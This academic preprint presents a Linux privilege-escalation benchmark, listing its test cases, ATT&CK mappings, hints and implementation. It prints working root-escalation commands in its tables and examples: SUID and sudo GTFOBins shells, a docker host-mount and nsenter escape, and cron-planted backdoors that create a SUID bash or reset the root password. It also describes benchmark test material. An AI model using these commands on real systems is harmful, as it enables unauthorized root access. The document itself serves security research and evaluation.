
Preprint

GOT ROOT? A LINUX PRIV-ESC BENCHMARK


Andreas Happe¹ and Jürgen Cito¹
¹ TU Wien, Austria
{andreas.happe, juergen.cito}@tuwien.ac.at

ABSTRACT
arXiv:2405.02106v2 [cs.CR] 6 May 2024

Linux systems are integral to the infrastructure of modern computing environments,
necessitating robust security measures to prevent unauthorized access.
Privilege escalation attacks represent a significant threat, typically allowing at-
tackers to elevate their privileges from an initial low-privilege account to the all-
powerful root account. A benchmark set of vulnerable systems is of high impor-
tance to evaluate the effectiveness of privilege-escalation techniques performed by
both humans and automated tooling. Analyzing their behavior allows defenders
to better fortify their entrusted Linux systems and thus protect their infrastructure
from potentially devastating attacks. To address this gap, we developed a com-
prehensive benchmark for Linux privilege escalation. It provides a standardized
platform to evaluate and compare the performance of human and synthetic actors,
e.g., hacking scripts or automated tooling.

1 INTRODUCTION
Linux systems are integral to the infrastructure of modern computing environments, necessitating
robust security measures to prevent unauthorized access. Privilege escalation attacks represent a
significant threat, typically allowing attackers to elevate their privileges from an initial low-privilege
account to the all-powerful root account.
Privilege-escalation attacks are typically performed manually by searching for exploitable
configurations or vulnerable tools. The initial act of system reconnaissance, commonly called
enumeration, is often automated with tools such as linpeas.sh¹. Exploitation itself is typically
performed manually by the (hopefully ethical) hacker.
A benchmark set of vulnerable systems is of high importance to evaluate the effectiveness of
privilege-escalation techniques performed by both humans and automated tooling. Analyzing their
behavior allows defenders to better fortify their entrusted Linux systems and thus protect their in-
frastructure from potentially devastating attacks.

1.1 REQUIREMENTS FOR THE BENCHMARK

The benchmark’s use-case, i.e., testing the efficacy of malicious privilege escalation attacks against
Linux systems, leads to unique requirements:

• It should consist of Linux systems with provided low-privilege access, containing vulnera-
bilities that allow for root-level access.
• Given the sensitive use-case, i.e., attacking a system, the test-cases mandate strong security
boundaries, i.e., they should be placed within virtual machines (VMs) to protect the
host system. Using VMs additionally allows the inclusion of kernel-level vulnerabilities,
e.g., DirtyC0W², without compromising the security of the host system.
• The test machines should be deployed within a local network. The machines themselves should
be able to run “air-gapped”, i.e., without an internet connection. Running malicious tools
over public networks, e.g., against cloud instances even when owned by the users themselves,
is prohibited in some jurisdictions.
¹ https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
² https://github.com/firefart/dirtycow


Table 1: Benchmark Test-Cases

Vulnerability-Class      Name                   Description
SUID/sudo files          suid-gtfo              exploiting suid binaries
SUID/sudo files          sudo-all               sudoers allows execution of any command
SUID/sudo files          sudo-gtfo              GTFO-bin in sudoers file
priv. groups/docker      docker                 user is in docker group
information disclosure   password reuse         root uses the same password as lowpriv
information disclosure   weak password          root is using the password “root”
information disclosure   password in file       there’s a vacation.txt in the user’s home directory with the root password
information disclosure   bash history           root password is in .bash_history
information disclosure   SSH key                lowpriv can use key-based SSH without password to become root
cron-based               cron                   file with write access is called through cron as root
cron-based               cron-wildcard          cron backs up the backup directory using wildcards
cron-based               cron/visible           same as test-5 but with user-visible /var/run/cron
cron-based               cron-wildcard/visible  same as test-10 but with user accessible /var/spool/cron

• Each VM should contain exactly a single vulnerability or attack path.


• The created virtual machines should be as extensible and transparent as possible, mandating
both the usage and the release as open source.

2 BUILDING THE BENCHMARK

To the best of our knowledge, there exists no benchmark for evaluating Linux priv-esc capabilities
fulfilling the stated requirements.
During pen-tester education, Capture-the-Flag Tournaments (CTFs) are often used. These are simu-
lated test-cases, often placed within Virtual Machines, in which penetration-testers typically initially
try to break in, and subsequently elevate their privileges to the root level. While these CTF machines
would fulfill many of the stated requirements, they typically contain more than a single vulnerability.
Thus, using these machines makes it difficult to assess the efficacy of automated tooling precisely
for evaluation scenarios.
Training companies such as HackTheBox or TryHackMe provide cloud-based access to a steady
stream of CTF machines. Those machines have two drawbacks: (1) the test machines are offered
through the cloud and are thus not controllable by the evaluator nor fulfilling our security require-
ments, and (2) CTF challenge machines change or degrade over time. Nobody can guarantee that a
challenge machine stays the same over time, hindering the reproducibility of results.
While being unsuited to be used directly, the CTF ecosystem provides invaluable information about
potential attack classes through training material provided by the respective companies as well as
through third-party “walkthroughs” detailing attacks against out-dated CTF machines.
To solve this, we designed a novel Linux priv-esc benchmark that can be executed locally, i.e., repro-
ducible and air-gapped. To gain detailed insights into privilege-escalation capabilities we introduce
distinct test-cases that allow reasoning about the feasibility of attackers’ capabilities for each distinct
vulnerability class.

2.1 VULNERABILITY CLASSES

This section describes the selection process for our implemented vulnerabilities.
The benchmark consists of test cases, each of which allows the exploitation of a single specific
vulnerability class. We based the vulnerability classes upon vulnerabilities typically abused during
CTFs as well as on vulnerabilities covered by online priv-esc training platforms. Overall, we focused
on configuration vulnerabilities, not exploits for specific software versions. Recent research (Happe
and Cito, 2023) indicates that configuration vulnerabilities are often searched for manually while
version-based exploits are often automatically detected. This indicates that improving the former
would yield a larger real-world impact on pen-testers’ productivity.
By analyzing TryHackMe’s PrivEsc training module (Tib3rius), we identified the following
vulnerability classes.


Table 2: Mapping onto MITRE ATT&CK

Name                                      Technique   Technique Name
vuln_suid_gtfo                            T1548.001   Setuid and Setgid
vuln_sudo_no_password                     T1548.003   Sudo and Sudo Caching
vuln_sudo_gtfo                            T1548.003   Sudo and Sudo Caching
vuln_docker                               T1543.005   Docker
cron_calling_user_file                    T1053.003   Cron
root_password_reuse                       T1110.001   Password Guessing
                                          T1078.001   Valid Account
root_password_root                        T1110.001   Password Guessing
file_with_root_password                   T1552.001   Credentials in Files
                                          T1078.001   Valid Account
vuln_password_in_shell_history            T1552.003   Bash History
                                          T1078.001   Valid Account
cron_calling_user_wildcard                T1053.003   Cron
root_allows_lowpriv_to_ssh                T1552.004   Private Keys
                                          T1078.001   Valid Account
cron_calling_user_file_cron_visible       T1053.003   Cron
cron_calling_user_wildcard_cron_visible   T1053.003   Cron

SUID and sudo-based vulnerabilities are based upon misconfiguration: the attacker is allowed to
execute binaries through sudo or to access binaries with the SUID bit set, and through them elevate
their privileges. Pen-testers commonly search a collection of exploitable binaries named GTFOBins
(GTFOBins, 2024) to exploit these vulnerabilities. We do not implement advanced vulnerabilities that
would require abusing Unix environment variables (ENV), shared libraries, or bash features such as
custom functions.
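
The search step described above can be sketched in a few lines of shell. This is a minimal illustration, not part of the benchmark: the function names are hypothetical, and the candidate list is a small hand-picked sample of binary names that have GTFOBins entries, not the full collection.

```shell
#!/bin/sh
# List regular files below a directory that have the SUID bit set.
# Usage: list_suid_files DIR
list_suid_files() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Keep only those paths (read from stdin) whose file name appears in a
# candidate list. The names below are an illustrative sample only;
# GTFOBins documents many more binaries.
filter_known_candidates() {
    while IFS= read -r path; do
        case "$(basename "$path")" in
            find|tar|vim|less|awk|env|python*) printf '%s\n' "$path" ;;
        esac
    done
}
```

A tester would typically combine both steps, e.g., `list_suid_files / | filter_known_candidates`, and then look up each hit manually before attempting exploitation.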
Cron-based vulnerabilities were implemented both with attackers being able to view root’s cron
spool directory (to analyze exploitable crontabs) as well as with inaccessible crontabs where the
attacker would have to derive that a script (named backup.cron.sh) in their home directory is utilized
by cron.
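
For the variant with a readable cron spool, the analysis of a crontab can be sketched as follows. The sketch assumes the user-crontab layout (five time fields followed by the command) and a hypothetical helper name; entries such as `@reboot` lines or variable assignments are simply ignored.

```shell
#!/bin/sh
# Print every command path from a user-style crontab (five time fields,
# then the command) that the current user is able to overwrite.
# Usage: writable_cron_commands CRONTAB_FILE
writable_cron_commands() {
    # Skip blank lines, comments and lines without an absolute command path.
    awk '!/^[[:space:]]*(#|$)/ && $6 ~ /^\// { print $6 }' "$1" |
    while IFS= read -r cmd; do
        if [ -f "$cmd" ] && [ -w "$cmd" ]; then
            printf '%s\n' "$cmd"
        fi
    done
}
```

Any path printed by this function is a script that cron executes and that the low-privilege user can modify. In the variant without access to the crontab, the attacker has to infer the same fact from the script's name and location alone.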
Information Disclosure-based vulnerabilities allow attackers to extract the root password from
files such as stored text-files, SSH-Keys or the shell’s history file.
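
A simple way to look for such disclosed credentials is a recursive keyword search over the user's home directory. The following sketch is only an illustration: the helper name and the keyword pattern are assumptions, and a real search would usually be followed by manual inspection of each reported file.

```shell
#!/bin/sh
# List files below a directory that mention a password-like keyword.
# -r: recurse, -l: print file names only, -i: ignore case,
# -E: extended regular expression.
# Usage: find_credential_hints DIR
find_credential_hints() {
    grep -rliE 'passw(or)?d|secret' "$1" 2>/dev/null
}
```

Called as `find_credential_hints /home/lowpriv`, this would also consider hidden files such as the shell's history file, since `grep -r` does not skip dotfiles.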
After analyzing HackTheBox’s Linux Privilege Escalation documentation (Hack The Box Ltd,
2024), we opted to add a docker-based test-case which would include both Privileged Groups
as well as Docker vulnerabilities.
We did not implement all of TryHackMe’s vulnerabilities. We opted to not implement Weak File
System permissions as world-writable /etc/passwd or /etc/shadow files are not commonly encoun-
tered during this millennium anymore and similar vulnerability classes are already covered through
the information-disclosure test cases. NFS root squashing attacks require the attacker to have root
access to a dedicated attacker box, which was deemed out of scope for the initial benchmark. Kernel
Exploits are already well covered by existing tooling, e.g., linux-exploit-suggester-2 (Donas). In
addition, kernel-level exploits are often unstable and introduce system instabilities and are thus not
well suited for a benchmark. We opted not to implement Service Exploits as this vulnerability was
product-specific (mysql db).
The resulting vulnerability test-cases are detailed in Table 1. We discussed this selection with two
professional penetration-testers who thought it to be representative of typical CTF challenges. The
overall architecture of our benchmark allows the easy addition of further test-cases in the future.

2.2 MAPPING ONTO MITRE ATT&CK

MITRE ATT&CK is “a knowledge base of cyber adversary behavior and taxonomy for adversarial
actions across their lifecycle”³, originally focusing on Microsoft Windows enterprise networks.
Subsequent iterations also include Linux attack vectors.
³ https://attack.mitre.org/resources/faq/#other-models-faq


Table 3: Provided Hints for each Test-Case

Name                                      Provided Hint
vuln_suid_gtfo                            there might be some exploitable suid binary on the system.
vuln_sudo_no_password                     there might be a sudo misconfiguration.
vuln_sudo_gtfo                            there might be some bad sudo binaries on the system.
vuln_docker                               lowpriv is allowed to use docker.
cron_calling_user_file                    /home/lowpriv/cron.sh is periodically called through cron as root.
root_password_reuse                       root might be reusing a password.
root_password_root                        root might be using an insecure password.
file_with_root_password                   the root password might be stored somewhere in the filesystem.
vuln_password_in_shell_history            the root password might be in the bash history.
cron_calling_user_wildcard                /home/lowpriv/backup is periodically backed up with tar through a cronjob as root.
root_allows_lowpriv_to_ssh                there might be a reused ssh key lying around in the home directory.
cron_calling_user_file_cron_visible       there’s a cronjob running a script as root in the system.
cron_calling_user_wildcard_cron_visible   there’s a cronjob running a script as root in the system.

Our benchmark consists of common attack paths, according to CTF documentation. In contrast,
MITRE ATT&CK is an unordered taxonomy of potential attack vectors. Table 2 maps the benchmark
cases onto their corresponding MITRE techniques.

2.3 ADDING HINTS FOR PRIMING

Recent research indicates that human hackers rely on intuition or checklists when searching for
vulnerabilities (Happe and Cito, 2023). The mentioned checklists often consist of different
vulnerability classes to test.
To allow emulation of this manual process, we introduce optional hints to each test case in our
benchmark that emulate going through a vulnerability class checklist, e.g., the hint for sudo binaries
is “there might be a sudo misconfiguration”. The hints are about the vulnerability class, not about a
concrete vulnerability. Iterating through multiple hints would thus emulate a human going through
a checklist of vulnerability classes. Currently implemented hints are provided in Table 3.
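
How an evaluation harness might iterate through such hints can be sketched as follows. The sketch is purely illustrative: the function names are hypothetical, only three hints from Table 3 are reproduced, and the test-case names are written with underscores, which is an assumption about their spelling.

```shell
#!/bin/sh
# Return the optional hint for a test case (wording taken from Table 3).
# Only three entries are reproduced to keep the sketch short.
hint_for() {
    case "$1" in
        vuln_suid_gtfo)        echo "there might be some exploitable suid binary on the system." ;;
        vuln_sudo_no_password) echo "there might be a sudo misconfiguration." ;;
        vuln_docker)           echo "lowpriv is allowed to use docker." ;;
        *)                     return 1 ;;
    esac
}

# Emulate a tester working through a checklist: present one hint at a
# time and silently skip names without a known hint. Printing stands in
# for handing the hint to the human or automated actor under evaluation.
walk_checklist() {
    for name in "$@"; do
        hint=$(hint_for "$name") || continue
        printf 'next check (%s): %s\n' "$name" "$hint"
    done
}
```

For example, `walk_checklist vuln_suid_gtfo vuln_sudo_no_password vuln_docker` prints the three hints in checklist order, one per line.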

2.4 BENCHMARK IMPLEMENTATION

To allow for extensibility, the benchmark was implemented using well-known Unix administration
tools. The virtual machines are provisioned using Vagrant and are based on standard Debian
GNU/Linux distributions. Vulnerabilities are introduced into each VM using Ansible automation
scripts. Ansible is also used to prepare a low-privilege account (“lowpriv”) and a high-privilege
account (“root”) with a standard password.

3 INSIGHTS INTO THE BENCHMARK

After describing the selection process and composition of the benchmark, we elaborate further upon
the benchmark itself and incorporate feedback from professional penetration testers.

3.1 ENUMERATION VS. EXPLOITATION

During the enumeration phase of an attack, system information is gathered and used to identify
potential vulnerable configurations and components that are subsequently targeted through attacks.
Penetration testers commonly stress the importance of system enumeration for successful penetra-
tion testing.
Anecdotally, the time needed to enumerate a system and subsequently identify a potential
attack vector far exceeds the time needed for exploitation.
Automation in Linux privilege-escalation scenarios is focused on making system enumeration more
efficient. Tools such as linpeas.sh automate the often tedious tasks of gathering system information.
Analysis of the gathered information as well as its exploitation is typically performed manually.


Table 4: Example exploitation commands.

Name                             Potential exploit
vuln_suid_gtfo                   python3.11 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
                                 find / -exec /bin/sh -p \; -quit
vuln_sudo_no_password            sudo -i
vuln_sudo_gtfo                   sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
root_password_reuse              test credentials root:trustno1
root_password_root               test credentials root:root
file_with_root_password          cat /home/lowpriv/vacation.txt; test credentials root password
vuln_password_in_shell_history   cat /home/lowpriv/.bash_history; test credentials root password
root_allows_lowpriv_to_ssh       ssh -o StrictHostKeyChecking=no root@localhost

This differs from the Windows ecosystem, where attack tooling often combines enumeration and
exploitation, e.g., tools such as PowerUp.ps1 or SharpUp can both detect and exploit
misconfigurations.

3.2 SINGLE- VS. MULTI-STEP EXPLOITATION

When analysing the potential exploitation of the vulnerabilities contained within the benchmark,
two distinct classes arise.
The first class consists of Single-Step Exploits, i.e., vulnerabilities that can be exploited by giving
a single command after successful identification in the enumeration phase. Example vulnerabilities
and their respective exploitation are shown in Table 4.
In contrast, Multi-Step Exploits warrant the execution of multiple steps. Each step depends on the
successful execution of all prior steps. One example of such a vulnerability is the vuln_docker
test-case, in which the low-privilege user is allowed to execute high-privileged Docker containers.
In such a scenario, the attacker would initially start a new container that mounts the host
filesystem with write access and subsequently modify the host filesystem to give the user elevated
access rights. We show an example of such an exploit in the following.

# mount the host filesystem into the container at /host
# and switch to it via chroot
$ docker run -it -v /:/host alpine chroot /host bash

# add the lowpriv user to the host's /etc/sudoers file
# (which allows lowpriv to execute commands on the host
# as root); after the chroot, the host file is at /etc/sudoers
$ echo "lowpriv ALL=(ALL:ALL) ALL" >> /etc/sudoers

# exit the container
$ exit

# execute command as root
$ sudo bash

Note that the same scenario could be executed as a single-step exploit when abusing
missing namespace separation:

# escape the namespace by using the host process
# namespace, esp. by switching into the namespaces
# of process 1 (init), which always runs as root on
# a Linux system.
$ docker run -it --privileged --pid=host alpine nsenter \
    --target 1 --mount --uts --ipc --net --pid -- bash


The benchmark suite also includes multiple scenarios utilizing timed tasks, i.e., cron tasks, in Linux
systems. While the prior multi-step exploitation examples had a causal ordering, cron-based exploits
also include a temporal component: in an initial step, the attacker places malicious code that will
subsequently be called by the cron process with elevated privileges. When this malicious code is
executed, it changes the system configuration and creates a backdoor that allows the attacker to
elevate their privileges. The attacker typically has to periodically check if the malicious code has
already been executed and try to elevate their privileges. Oftentimes, the attacker does not know
when or if the malicious code is executed, but has to use educated guesses about potential execution
times, e.g., that a backup script will typically be called outside of typical office hours.
The scenarios cron_calling_user_file and cron_calling_user_file_cron_visible could be abused with
the following commands:
# place code that adds a new suid binary to the system
# when called through cron (printf expands the \n escapes)
printf '#!/bin/bash\ncp /usr/bin/bash /home/bash\nchmod +s /home/bash\n' \
    > /home/lowpriv/backup.cron.sh

# alternative: resetting the root password when called through cron
# (chpasswd reads user:password pairs non-interactively)
printf '#!/bin/bash\necho "root:trustno1" | chpasswd\n' \
    > /home/lowpriv/backup.cron.sh
In those examples, the attacker has to wait until the cron job is executed; the wait typically ranges
from minutes in CTFs to hours in real-life systems. Only after the cron command has been executed
is the backdoor inserted into the system, and the attacker can subsequently abuse that backdoor to
elevate their privileges.
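
The periodic check described above can be sketched as a small polling loop. This is an illustrative sketch only: the function name, the polling interval and the retry limit are assumptions, and the example targets the SUID-copy variant of the backdoor.

```shell
#!/bin/sh
# Poll until FILE exists with the SUID bit set, i.e., until the cron job
# has run the planted script. Returns 0 on success and 1 once MAX_TRIES
# checks have failed.
# Usage: wait_for_suid FILE INTERVAL_SECONDS MAX_TRIES
wait_for_suid() {
    tries=0
    while [ "$tries" -lt "$3" ]; do
        if [ -u "$1" ]; then
            return 0
        fi
        tries=$((tries + 1))
        sleep "$2"
    done
    return 1
}
```

An attacker could, for instance, run `wait_for_suid /home/bash 60 120 && /home/bash -p` to check once per minute for up to two hours and start a privileged shell as soon as the backdoor appears.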

4 CONCLUSION
We curated a new Linux privilege escalation benchmark and elaborated on the decisions that led to
its creation. We further detail particularities about the enumeration and exploitation of Linux-based
systems that are mirrored within our benchmark.
As the benchmark is released as open-source on GitHub, and through the usage of standard Linux
system administration tools, we enable third-parties to easily extend the benchmark with additional
attack classes or more scenarios for our initially identified attack classes.

DATA AVAILABILITY
The benchmark suite has been published at github.com/ipa-lab/benchmark-privesc-linux.

REFERENCES
Jonathan Donas. Linux exploit suggester 2. https://github.com/jondonas/linux-exploit-suggester-2.
Accessed: 2024-03-11.
GTFOBins. GTFOBins. https://gtfobins.github.io/, 2024. Accessed: 2024-03-11.
Hack The Box Ltd. HackTheBox Academy: Linux privilege escalation.
https://academy.hackthebox.com/course/preview/linux-privilege-escalation, 2024.
Accessed: 2024-03-11.
Andreas Happe and Jürgen Cito. Understanding hackers’ work: An empirical study of offensive
security practitioners. In Proceedings of the 31st ACM Joint European Software Engineering
Conference and Symposium on the Foundations of Software Engineering, ESEC/FSE 2023, New
York, NY, USA, 2023. Association for Computing Machinery.
Tib3rius. TryHackMe: Linux privesc. https://tryhackme.com/room/linuxprivesc.
Accessed: 2024-03-11.
